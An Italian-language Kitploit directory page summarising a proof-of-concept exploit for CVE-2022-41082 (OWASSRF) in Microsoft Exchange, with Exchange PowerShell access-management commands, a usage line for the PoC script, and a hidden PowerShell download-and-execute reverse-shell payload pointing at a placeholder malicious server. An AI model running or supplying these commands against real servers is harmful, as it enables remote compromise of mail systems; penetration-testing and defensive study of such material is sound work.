Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
Strumenti/GitHubGitHub/soltanali0/cve-2022-41082
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

Vedi Repository
311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-41082

Questo repository contiene uno strumento proof-of-concept (PoC) per sfruttare la vulnerabilità OWASSRF (CVE-2022-41082) nei server Microsoft Exchange. L'exploit consente agli attaccanti di eseguire comandi arbitrari sul server, compromettendo potenzialmente il sistema.

Panoramica

Lo strumento sfrutta una vulnerabilità OWASSRF per bypassare l'autenticazione e ottenere l'esecuzione remota di codice (RCE) su un server Exchange. Sfruttando questa vulnerabilità, un attaccante può eseguire comandi come se fosse un utente autenticato, con gravi implicazioni per la sicurezza.

Come funziona

  1. Bypass dell'autenticazione: lo strumento si connette al server Exchange di destinazione, bypassando i meccanismi di autenticazione tramite richieste appositamente costruite.
  2. Esecuzione remota di codice: dopo aver effettuato l'accesso, lo strumento apre una sessione che consente l'esecuzione di comandi sul server Exchange.
  3. Esecuzione dei comandi: gli utenti possono specificare comandi da eseguire sul server, consentendo varie azioni, tra cui manipolazione di file, operazioni di rete o creazione di reverse shell.

Nota importante

Quando si utilizza questo strumento, per favore assicurati di mantenere aperta la stessa sessione di Exchange Management Shell. È fondamentale abilitare l'accesso a Remote PowerShell per almeno un utente dopo averlo disabilitato per gli altri. In caso contrario, si potrebbe perdere l'accesso a Management Shell su tutti i server Exchange.

Comandi per la gestione dell'accesso a PowerShell

Ecco alcuni comandi PowerShell utili per verificare e gestire chi ha accesso:

Scarica lo strumento

Verifica dell'accesso a PowerShell

Per vedere quali utenti hanno accesso a Remote PowerShell e quali no, esegui:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

Disabilitazione dell'accesso a PowerShell per tutti gli utenti

Avvertenza: fai attenzione a non chiudere la finestra di Exchange Management Shell a meno che tu non aggiunga di nuovo almeno un utente.

Puoi disabilitare l'accesso a PowerShell per tutti gli utenti usando i seguenti comandi:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

Oppure usa un singolo comando per ottenere lo stesso risultato:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

Riabilitazione dell'accesso per un utente specifico

Per concedere l'accesso a Remote PowerShell a un utente specifico, esegui:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

Soluzione alternativa in caso di perdita dell'accesso a PowerShell

Se perdi l'accesso a PowerShell per tutti gli utenti, puoi creare un nuovo utente della cassetta postale con diritti di amministratore. Questo nuovo utente aggirerà i criteri applicati, consentendoti di utilizzare di nuovo Exchange Management Shell.

Utilizzo dello strumento PoC

Requisiti

  • Python 3.x
  • Librerie richieste (installale tramite pip se necessario)

Esecuzione dello strumento

Per eseguire lo strumento PoC, usa il seguente comando:

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

Sostituisci <target_IP>, <username>, <password> e <command_file> con i tuoi valori specifici.

Esempio di comando per reverse shell

Puoi modificare il comando nel tuo cmd_file per includere un payload di reverse shell. Ad esempio:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

Questo comando scaricherà ed eseguirà uno script PowerShell dal tuo server, fornendoti una reverse shell.

Riferimenti

Per maggiori informazioni sulla vulnerabilità OWASSRF e sul codice PoC, visita il seguente link: OWASSRF CVE-2022-41082 PoC e https://www.youtube.com/watch?v=c2DZYP6jc7g